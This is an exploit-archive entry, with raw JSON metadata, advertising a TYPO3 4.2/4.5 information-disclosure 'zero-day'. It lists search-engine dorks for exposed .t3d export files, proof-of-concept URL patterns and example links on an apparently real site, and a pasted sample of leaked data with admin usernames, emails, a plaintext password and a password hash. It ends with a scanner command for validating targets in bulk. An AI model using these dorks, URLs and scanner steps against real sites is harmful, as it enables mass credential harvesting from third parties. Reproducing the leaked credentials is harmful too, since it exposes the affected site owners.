ID PACKETSTORM:133961
Type packetstorm
Reporter Cleiton Pinheiro
Modified 2015-10-14T00:00:00
Description
*INFORMATION:*
# ----------------------------------------------------------
#[+] Name: (0day) Typo3 - Full Info Disclosure
#[+] Type: Full Info Disclosure
#[+] Vendor: https://typo3.org/typo3-cms/
#[+] VULNERABLE VERSIONS: 4.2, 4.5
# ----------------------------------------------------------
#[+] AUTHOR: Cleiton Pinheiro / Nick: googleINURL
#[+] EMAIL: inurlbr@gmail.com
#[+] Blog: http://blog.inurl.com.br
#[+] Twitter: https://twitter.com/googleinurl
#[+] Fanpage: https://fb.com/InurlBrasil
#[+] Pastebin: http://pastebin.com/u/Googleinurl
#[+] GIT: https://github.com/googleinurl
#[+] PSS: http://packetstormsecurity.com/user/googleinurl
#[+] EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
#[+] YOUTUBE: http://youtube.com/c/INURLBrasil
#[+] PLUS: http://google.com/+INURLBrasil
#[+] IRC: irc.pŕiv8.jp <http://irc.xn--piv8-q4a.jp> / #inurlbrasil
#[+] SEARCH DORKS:
/fileadmin/utopia ext:xml
/fileadmin/utopia*.t3d.xml
site:fr /fileadmin/utopia ext:xml
"utopia" inurl:t3d ext:xml
/fileadmin/ typo3 ext:t3d
# ----------------------------------------------------------
*#[+] POC FILE .XML:*
http://{server}/fileadmin/utopia{random}.t3d.xml
http://{server}/subdir/fileadmin/utopia{random}.t3d.xml
*#[+] Ex:*
http://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml
http://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml
*#[+] SCREENSHOT:*
https://3.bp.blogspot.com/-cfVOTa_fbmQ/Vh3kC8v14cI/AAAAAAAABaA/kDEy3Ui9Mbg/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A12%253A34.png
*#[+] POC FILE .T3D:*
http://{server}/fileadmin/*.t3d
http://{server}/fileadmin/archives_site/*.t3d
http://{server}/subdir/fileadmin/*.t3d
*#[+] Ex:*
http://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d
http://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d
*#[+] Example file contents:*
s:11:"admin_xxxx";s:5:"email";s:26:"admin@xxxx-autoxxxx.fr";s:8:"username";s:10:"adminxxx";s:8:"password";s:10:"adminlilas";s:7:"origUid";a:2:{i:0;s:2:"10";i:1;s:14:"Administrateur";}}}}i:3;a:1:{s:8:"fe_users";a:1:{i:100;a:4:{s:4:"name";s:10:"user_xxx";s:5:"email";s:26:"admin@xxx-autopartage.fr";s:8:"username";s:9:"userxxx";s:8:"password";s:32:"dcd9e367d292b7019fab159ab8c8c26a";}}}i:4;a:1:{s:17:"tx_icsutopia_site";a:1:{i:1;a:4:{s:6:"level0";s:2:"72";s:6:"level1";s:2:"73";s:6:"level2";s:3:"232";s:10:"base_model";s:9:"72,73,232";}}}}s:3:"t3d";s:43:"/www/html/typo3temp/utopia519e1b3d6c76b.t3d";}}s:15:"relStaticTables";a:1
*#[+] Mass validation using SCANNER INURLBR:*
*# Download:* https://github.com/googleinurl/SCANNER-INURLBR
*#[+] COMMAND:*
php inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t 2 -a '<username>'
*# Result screenshot:*
https://3.bp.blogspot.com/-JBREv-QJRRc/Vh3oH-HnhlI/AAAAAAAABaM/eXzM1uUOcxk/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A29%253A37.png
`
{"type": "packetstorm", "published": "2015-10-14T00:00:00", "reporter": "Cleiton Pinheiro", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8a0ad52e2562b38dead939830738f254"}, {"key": "modified", "hash": "b36e0c450721a2c39818d05cc31e3842"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b36e0c450721a2c39818d05cc31e3842"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9deef18fc40565f59e94e462b7981f80"}, {"key": "sourceData", "hash": "b0e0e499f26a6d897113c790679ce890"}, {"key": "sourceHref", "hash": "aa921d3432d96ca4a014ca047a5ee403"}, {"key": "title", "hash": "941c1555c995a4bb76eeb474f1b54221"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`*INFORMA\u00c7\u00d5ES:* \n \n# ---------------------------------------------------------- \n \n#[+] Name: (0day) Typo3 - Full Info Disclosure \n \n#[+] Type: Full Info Disclosure \n \n#[+] Vendor: https://typo3.org/typo3-cms/ \n#[+] VULNERABLE VERSIONS: 4.2, 4.5 \n \n# ---------------------------------------------------------- \n \n#[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL #[+] EMAIL: \ninurlbr@gmail.com #[+] Blog: http://blog.inurl.com.br #[+] Twitter: \nhttps://twitter.com/googleinurl #[+] Fanpage: https://fb.com/InurlBrasil \n#[+] Pastebin http://pastebin.com/u/Googleinurl #[+] GIT: \nhttps://github.com/googleinurl #[+] PSS: \nhttp://packetstormsecurity.com/user/googleinurl #[+] EXA: \nhttp://exploit4arab.net/author/248/Cleiton_Pinheiro #[+] YOUTUBE: \nhttp://youtube.com/c/INURLBrasil #[+] PLUS: http://google.com/+INURLBrasil \n#[+] IRC: irc.p\u0155iv8.jp 
<http://irc.xn--piv8-q4a.jp> / #inurlbrasil \n \n \n#[+] SEARCH DORKS: \n \n/fileadmin/utopia ext:xml \n \n/fileadmin/utopia*.t3d.xml \nsite:fr /fileadmin/utopia ext:xml \n\"utopia\" inurl:t3d ext:xml \n/fileadmin/ typo3 ext:t3d \n \n# ---------------------------------------------------------- \n \n \n*#[+] POC FILE .XML:* \n \n \nhttp://{server}/fileadmin/utopia{random}.t3d.xml \n \nhttp://{server}/subdir/fileadmin/utopia{random}.t3d.xml \n \n*#[+] **Ex:* \n \nhttp://vull.fr/fileadmin/utopia4cb2c07e326f4.t3d.xml \n \nhttp://vull.fr/subdir/subdir2_/fileadmin/utopia506c4cd063fa0.t3d.xml \n*#[+] PRINT:* \nhttps://3.bp.blogspot.com/-cfVOTa_fbmQ/Vh3kC8v14cI/AAAAAAAABaA/kDEy3Ui9Mbg/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A12%253A34.png \n \n*#[+] POC FILE .**T3D:* \n \nhttp://{server}/fileadmin/*.t3d \n \nhttp://{server}/fileadmin/archives_site/*.t3d \n \nhttp://{server}/subdir/fileadmin/*.t3d \n \n*#[+] **Ex:* \n \nhttp://vull.fr/fileadmin/archives_site/utopia_Inscription%20lilas%20autopartage.t3d \n \nhttp://vull.fr/subdir/fileadmin/archives_site/utopia_autotao.t3d \n \n \n*#[+] **Example file contents:* \n \ns:11:\"admin_xxxx\";s:5:\"email\";s:26:\"admin@xxxx-autoxxxx.fr\";s:8:\"username\";s:10:\"adminxxx\";s:8:\"password\";s:10:\"adminlilas\";s:7:\"origUid\";a:2:{i:0;s:2:\"10\";i:1;s:14:\"Administrateur\";}}}}i:3;a:1:{s:8:\"fe_users\";a:1:{i:100;a:4:{s:4:\"name\";s:10:\"user_xxx\";s:5:\"email\";s:26:\"admin@xxx-autopartage.fr\";s:8:\"username\";s:9:\"userxxx\";s:8:\"password\";s:32:\"dcd9e367d292b7019fab159ab8c8c26a\";}}}i:4;a:1:{s:17:\"tx_icsutopia_site\";a:1:{i:1;a:4:{s:6:\"level0\";s:2:\"72\";s:6:\"level1\";s:2:\"73\";s:6:\"level2\";s:3:\"232\";s:10:\"base_model\";s:9:\"72,73,232\";}}}}s:3:\"t3d\";s:43:\"/www/html/typo3temp/utopia519e1b3d6c76b.t3d\";}}s:15:\"relStaticTables\";a:1 \n \n \n*#[+] **Validation in mass using SCANNER INURLBR**:* \n*# Download: **https://github.com/googleinurl/SCANNER-INURLBR 
\n<https://github.com/googleinurl/SCANNER-INURLBR>* \n \n*#[+] **COMMAND:* \nphp inurlbr.php --dork '/fileadmin/utopia*.t3d.xml' -s t3d.txt -t 2 -a \n'<username>' \n \n*#Result print:* \nhttps://3.bp.blogspot.com/-JBREv-QJRRc/Vh3oH-HnhlI/AAAAAAAABaM/eXzM1uUOcxk/s640/Captura%2Bde%2Btela%2Bde%2B2015-10-14%2B02%253A29%253A37.png \n`\n", "viewCount": 18, "history": [], "lastseen": "2016-11-03T10:16:45", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/133961/Typo3-4.2-4.5-Information-Disclosure.html", "sourceHref": "https://packetstormsecurity.com/files/download/133961/typo345-disclose.txt", "title": "Typo3 4.2 / 4.5 Information Disclosure", "enchantments": {"score": {"value": -1.4, "vector": "NONE", "modified": "2016-11-03T10:16:45"}, "dependencies": {"references": [], "modified": "2016-11-03T10:16:45"}, "vulnersScore": -1.4}, "references": [], "id": "PACKETSTORM:133961", "hash": "3462b1ccefdc0cb2a161817dd3b279b21294514d1a8fe9eb973fcb9b8b65f32a", "edition": 1, "cvelist": [], "modified": "2015-10-14T00:00:00", "description": ""}
{}